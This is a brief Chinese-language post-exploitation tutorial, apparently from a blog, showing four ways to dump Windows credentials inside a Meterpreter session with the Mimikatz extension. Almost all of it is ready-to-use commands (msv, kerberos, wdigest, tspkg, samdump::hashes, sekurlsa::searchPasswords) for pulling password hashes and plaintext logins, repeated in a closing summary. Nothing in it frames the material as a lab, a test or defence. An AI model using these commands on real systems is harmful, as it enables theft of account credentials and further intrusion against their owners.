進去meterpreter後getuid一下
這獲得系統管理者權限
開始
加載mimikatz子產品
load mimikatz
加載成功.
第一種方法:
擷取登入密碼的hash值
msv
上面已經是得到hash值了. 下面算明文密碼.
擷取明文密碼
kerberos
look...拿到登入的明文密碼了.
第二種方法:
使用另一種方式擷取哈希值
mimikatz_command -f samdump::hashes
根據上面的方式擷取明文密碼
mimikatz_command -f sekurlsa::searchPasswords
第三種方法:
Wdigest指令
這個指令呢, 沒有上面的複雜,加載子產品後直接調用這個wdigest.
wdigest
第四種方法:
tspkg指令
tspkg
總結
一、
load mimikatz #加載mimikatz
msv #擷取hash值
kerberos #擷取明文
二、
load mimikatz #加載mimikatz
wdigest #擷取系統賬戶資訊
三、
load mimikatz #加載mimikatz
tspkg #擷取系統賬戶資訊
四、
load mimikatz #加載mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords